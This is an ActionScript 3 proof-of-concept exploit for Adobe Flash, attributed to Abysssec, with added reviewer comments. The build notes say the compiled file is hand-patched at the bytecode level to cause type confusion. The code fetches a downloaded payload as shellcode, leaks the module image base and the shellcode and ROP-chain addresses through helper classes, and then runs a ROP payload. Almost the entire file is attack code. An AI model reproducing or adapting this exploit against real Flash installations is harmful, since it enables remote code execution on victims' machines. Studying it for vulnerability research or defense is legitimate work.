// compile >mxmlc -source-path=c:\ C:\poc\main.as
// decompress using SWF_Compressor
// change 07 01 02 07 |01| 03 07 02 05 -> 07 01 02 07 01 |02| 07 02 05
// Shahin [at] abysssec.com
// twitter: @abysssec
package poc

{

import flash.utils.*;
import flash.display.*;
import flash.text.*;
import flash.external.*
import flash.events.*;

// Proof-of-concept Sprite.
// NOTE(review): this file is not a self-contained program. The build notes at
// the top of the file say the compiled SWF is decompressed and a bytecode
// sequence is patched by hand afterwards, and the classes Download,
// Real_Ref_Class and Original_Class are not defined here. The shipped SWF
// therefore differs from anything mxmlc would emit from this source, and the
// statement layout below should not be reordered, since the patch is applied
// by byte offset.
public class main extends Sprite

{

// Loader for the bytes that onLoad() later forwards as `payload`.
public var d:Download = new Download();

// Getter that always returns null but is declared with the return type
// Real_Ref_Class. Presumably this declaration is the one whose type bytes the
// post-compile patch rewrites (see the "change 07 01 02 07 ..." note at the top
// of the file) — verify against the patched SWF.
function get get_test1():Real_Ref_Class

{

return null;

}

// Constructor: wait for the download to complete, then continue in onLoad().
public function main()

{

d.addEventListener(Event.COMPLETE, onLoad);

d.init();

}

// COMPLETE handler: hand the downloaded bytes to Real_Ref_Class, then run sploit().
public function onLoad(e:Event):void {

var payload:String = d.getBinary();

Real_Ref_Class.setShellcode(payload);

sploit();

}

// Main body. Three times it takes a value obtained from Original_Class, turns
// it into a String, feeds it back through Original_Class.strToInt(), wraps the
// result in a Number, serialises that Number with ByteArray.writeDouble() and
// reads bytes 4..7 back as a big-endian uint. What Original_Class does with
// those values cannot be confirmed from this file.
public function sploit()

{

/////////////////////// LEAK IMAGE BASE ////////////////////////////

var objshellcode:uint = Original_Class.shellcode();

// Clear the low three bits (8-byte alignment).
var p_objshellcode:uint = objshellcode & 0xFFFFFFF8;

var str_objshellcode:String = p_objshellcode.toString();

// Untyped declaration; strToInt's return type is not visible here.
var int_str_objshellcode = Original_Class.strToInt(str_objshellcode);

var z:Number = new Number(int_str_objshellcode);

var b:ByteArray = new ByteArray();

b.writeDouble(z);

// Bytes 4..7 of the IEEE-754 double assembled into a uint. A ByteArray is
// big-endian by default, so this is the low 32-bit word of the double.
var res:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];

// Hard-coded delta between the leaked word and the module base. This pins the
// PoC to one specific build of the target; it has to be re-derived for any
// other version and is the most version-specific value in the file.
var imageBase:uint = res - 0X004E2F58;

/////////////////// LEAK SHELLCODE STRING ADDRESS /////////////////

var temp:uint = p_objshellcode + 0x8;

// NOTE: `str` and `istr` are assigned here but their `var` declarations are
// further down, in the ROPPayload section. AS3 hoists function-scope `var`s,
// so this compiles, but it is easy to misread and trips strict-mode warnings.
str = temp.toString();

istr = Original_Class.strToInt(str);

z = new Number(istr);

b = new ByteArray();

b.writeDouble(z);

// Same low-word extraction as above; note this local is left untyped.
var SHELLCODELeak = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];

///////////////////// LEAK ROPPayload ADDRESS /////////////////

var objROPPayload:uint = Original_Class.ROPPayload(imageBase,SHELLCODELeak);

var temp2:uint = objROPPayload & 0xFFFFFFF8;

// These are the declarations hoisted for the assignments in the previous
// section. The values computed from temp2 on the next two lines are
// overwritten below before they are read, so unless strToInt has side
// effects this pair of statements does nothing.
var str:String = temp2.toString();

var istr = Original_Class.strToInt(str);

temp = temp2 + 0x8;

str = temp.toString();

istr = Original_Class.strToInt(str);

z = new Number(istr);

b = new ByteArray();

b.writeDouble(z);

var ROPPayloadLeak:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];

// Both leaked words are handed to Original_Class, which is not in this file.
var obj:Original_Class = Original_Class.static_func1(ROPPayloadLeak, imageBase);

obj.normal_func();

}

}

}